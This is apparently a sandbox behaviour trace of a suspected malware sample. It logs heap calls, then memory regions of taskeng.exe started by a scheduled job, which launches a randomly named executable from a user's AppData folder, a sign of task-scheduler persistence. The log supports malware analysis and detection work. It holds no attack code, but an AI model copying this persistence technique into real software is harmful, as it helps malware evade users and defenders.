[0170.774] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f52e8) returned 0x14
[0170.774] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f52e8 | out: hHeap=0x4e0000) returned 1
[0170.774] GetProcessHeap () returned 0x4e0000
[0170.774] GetProcessHeap () returned 0x4e0000
[0170.774] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6968) returned 1
[0170.774] GetProcessHeap () returned 0x4e0000
[0170.774] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6968) returned 0x30
[0170.775] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6968 | out: hHeap=0x4e0000) returned 1
[0170.775] GetProcessHeap () returned 0x4e0000
[0170.775] GetProcessHeap () returned 0x4e0000
[0170.775] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5388) returned 1
[0170.775] GetProcessHeap () returned 0x4e0000
[0170.775] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5388) returned 0x14
[0170.775] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5388 | out: hHeap=0x4e0000) returned 1
[0170.775] GetProcessHeap () returned 0x4e0000
[0170.775] GetProcessHeap () returned 0x4e0000
[0170.775] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x504d58) returned 1
[0170.775] GetProcessHeap () returned 0x4e0000
[0170.775] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x504d58) returned 0x82
[0170.776] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x504d58 | out: hHeap=0x4e0000) returned 1
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5748) returned 1
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5748) returned 0x14
[0170.776] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5748 | out: hHeap=0x4e0000) returned 1
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4bd0) returned 1
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4bd0) returned 0x10
[0170.776] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4bd0 | out: hHeap=0x4e0000) returned 1
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5030) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5030) returned 0x14
[0170.777] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5030 | out: hHeap=0x4e0000) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5050) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5050) returned 0x14
[0170.777] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5050 | out: hHeap=0x4e0000) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5070) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5070) returned 0x14
[0170.777] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5070 | out: hHeap=0x4e0000) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5090) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5090) returned 0x14
[0170.777] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5090 | out: hHeap=0x4e0000) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.778] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4be8) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4be8) returned 0x10
[0170.778] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4be8 | out: hHeap=0x4e0000) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f50b0) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f50b0) returned 0x14
[0170.778] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f50b0 | out: hHeap=0x4e0000) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5128) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5128) returned 0x14
[0170.778] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5128 | out: hHeap=0x4e0000) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5168) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5168) returned 0x14
[0170.778] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5168 | out: hHeap=0x4e0000) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f51a8) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f51a8) returned 0x14
[0170.779] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f51a8 | out: hHeap=0x4e0000) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f51c8) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f51c8) returned 0x14
[0170.779] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f51c8 | out: hHeap=0x4e0000) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5268) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5268) returned 0x14
[0170.779] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5268 | out: hHeap=0x4e0000) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c00) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4c00) returned 0x10
[0170.779] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c00 | out: hHeap=0x4e0000) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5148) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5148) returned 0x14
[0170.779] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5148 | out: hHeap=0x4e0000) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4bb8) returned 1
[0170.780] GetProcessHeap () returned 0x4e0000
[0170.780] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4bb8) returned 0x10
[0170.780] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4bb8 | out: hHeap=0x4e0000) returned 1
[0170.780] exit (_Code=0)
Thread:
id = 36
os_tid = 0x954
Process:
id = "7"
image_name = "taskeng.exe"
filename = "c:\\windows\\system32\\taskeng.exe"
page_root = "0x1f977000"
os_pid = "0x4d0"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "created_scheduled_job"
parent_id = "6"
os_parent_pid = "0x34c"
cmd_line = "taskeng.exe {6D9545EF-31E1-4286-8B8C-42C7F98001F2} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\\kEecfMwgj:Interactive:LUA[1]"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f343" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2281
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2282
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2283
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2284
start_va = 0x190000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 2285
start_va = 0x772b0000
end_va = 0x77458fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2286
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2287
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2288
start_va = 0xff420000
end_va = 0xff493fff
monitored = 0
entry_point = 0xff42f44c
region_type = mapped_file
name = "taskeng.exe"
filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe")
Region:
id = 2289
start_va = 0x7feff5d0000
end_va = 0x7feff5d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2290
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2291
start_va = 0x7fffffd4000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 2292
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2423
start_va = 0x210000
end_va = 0x37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 2424
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2425
start_va = 0x7fefd2d0000
end_va = 0x7fefd33bfff
monitored = 0
entry_point = 0x7fefd2d2780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2426
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2427
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2428
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2429
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2430
start_va = 0x77090000
end_va = 0x77189fff
monitored = 0
entry_point = 0x770aa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2431
start_va = 0x7feff1e0000
end_va = 0x7feff246fff
monitored = 0
entry_point = 0x7feff1eb03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2432
start_va = 0x7fefed60000
end_va = 0x7fefed6dfff
monitored = 0
entry_point = 0x7fefed61080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2433
start_va = 0x7fefdce0000
end_va = 0x7fefdda8fff
monitored = 0
entry_point = 0x7fefdd5a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2434
start_va = 0x7fefd8b0000
end_va = 0x7fefd94efff
monitored = 0
entry_point = 0x7fefd8b25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2435
start_va = 0x7fefd5d0000
end_va = 0x7fefd7d2fff
monitored = 0
entry_point = 0x7fefd5f3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2436
start_va = 0x7feff250000
end_va = 0x7feff37cfff
monitored = 0
entry_point = 0x7feff29ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2437
start_va = 0x7feff380000
end_va = 0x7feff456fff
monitored = 0
entry_point = 0x7feff383274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2438
start_va = 0x7fefa790000
end_va = 0x7fefa799fff
monitored = 0
entry_point = 0x7fefa79260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 2439
start_va = 0x7fefcd20000
end_va = 0x7fefcd8cfff
monitored = 0
entry_point = 0x7fefcd21010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 2440
start_va = 0x380000
end_va = 0x52ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 2441
start_va = 0x380000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 2442
start_va = 0x520000
end_va = 0x52ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000520000"
filename = ""
Region:
id = 2443
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2444
start_va = 0x530000
end_va = 0x6b7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000530000"
filename = ""
Region:
id = 2445
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2446
start_va = 0x7feff1b0000
end_va = 0x7feff1ddfff
monitored = 0
entry_point = 0x7feff1b1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2447
start_va = 0x7fefd9f0000
end_va = 0x7fefdaf8fff
monitored = 0
entry_point = 0x7fefd9f1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2448
start_va = 0x6c0000
end_va = 0x840fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006c0000"
filename = ""
Region:
id = 2449
start_va = 0x850000
end_va = 0x1c4ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000850000"
filename = ""
Region:
id = 2450
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskeng.exe.mui"
filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui")
Region:
id = 2451
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2452
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 2453
start_va = 0x1c50000
end_va = 0x1deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c50000"
filename = ""
Region:
id = 2454
start_va = 0xe0000
end_va = 0x15cfff
monitored = 0
entry_point = 0xecec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2455
start_va = 0xe0000
end_va = 0x15cfff
monitored = 0
entry_point = 0xecec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2456
start_va = 0x7fefd0f0000
end_va = 0x7fefd0fefff
monitored = 0
entry_point = 0x7fefd0f1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2457
start_va = 0x7feff190000
end_va = 0x7feff1aefff
monitored = 0
entry_point = 0x7feff1960e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2458
start_va = 0x480000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2459
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 2460
start_va = 0x7feff460000
end_va = 0x7feff53afff
monitored = 0
entry_point = 0x7feff480760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2461
start_va = 0x7fefcaf0000
end_va = 0x7fefcb07fff
monitored = 0
entry_point = 0x7fefcaf3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2462
start_va = 0xe0000
end_va = 0x124fff
monitored = 0
entry_point = 0xe1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2463
start_va = 0xe0000
end_va = 0x124fff
monitored = 0
entry_point = 0xe1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2464
start_va = 0xe0000
end_va = 0x124fff
monitored = 0
entry_point = 0xe1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2465
start_va = 0xe0000
end_va = 0x124fff
monitored = 0
entry_point = 0xe1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2466
start_va = 0xe0000
end_va = 0x124fff
monitored = 0
entry_point = 0xe1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2467
start_va = 0x7fefc7f0000
end_va = 0x7fefc836fff
monitored = 0
entry_point = 0x7fefc7f1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2468
start_va = 0x7feff540000
end_va = 0x7feff5b0fff
monitored = 0
entry_point = 0x7feff551e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2469
start_va = 0xe0000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 2470
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 2471
start_va = 0x7fefd0c0000
end_va = 0x7fefd0e4fff
monitored = 0
entry_point = 0x7fefd0c9658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2472
start_va = 0x1c50000
end_va = 0x1d4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c50000"
filename = ""
Region:
id = 2473
start_va = 0x1d70000
end_va = 0x1deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d70000"
filename = ""
Region:
id = 2474
start_va = 0x1e30000
end_va = 0x1eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e30000"
filename = ""
Region:
id = 2475
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 2476
start_va = 0x1eb0000
end_va = 0x217efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2477
start_va = 0x7fefd1e0000
end_va = 0x7fefd1f3fff
monitored = 0
entry_point = 0x7fefd1e10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 2478
start_va = 0x2200000
end_va = 0x227ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 2479
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 2480
start_va = 0x22d0000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 2481
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 2482
start_va = 0x160000
end_va = 0x160fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 2483
start_va = 0x7fefd950000
end_va = 0x7fefd9e8fff
monitored = 0
entry_point = 0x7fefd951c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2484
start_va = 0x7fefa490000
end_va = 0x7fefa498fff
monitored = 0
entry_point = 0x7fefa4911a0
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 2485
start_va = 0x7fefbb50000
end_va = 0x7fefbba5fff
monitored = 0
entry_point = 0x7fefbb5bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2486
start_va = 0x2350000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002350000"
filename = ""
Region:
id = 2487
start_va = 0x2350000
end_va = 0x242efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002350000"
filename = ""
Region:
id = 2488
start_va = 0x2430000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002430000"
filename = ""
Region:
id = 2489
start_va = 0x7fefb720000
end_va = 0x7fefb737fff
monitored = 0
entry_point = 0x7fefb721130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 2490
start_va = 0x7fefb6e0000
end_va = 0x7fefb714fff
monitored = 0
entry_point = 0x7fefb6e1064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 2491
start_va = 0x25c0000
end_va = 0x263ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025c0000"
filename = ""
Region:
id = 2492
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Thread:
id = 46
os_tid = 0x4d4
Thread:
id = 47
os_tid = 0x4ec
Thread:
id = 48
os_tid = 0x4f8
Thread:
id = 49
os_tid = 0x514
Thread:
id = 50
os_tid = 0x518
Thread:
id = 51
os_tid = 0x51c
Thread:
id = 52
os_tid = 0x52c
Process:
id = "8"
image_name = "nfxioujoilco.exe"
filename = "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe"
page_root = "0x1f88c000"
os_pid = "0x530"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "7"
os_parent_pid = "0x4d0"
cmd_line = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
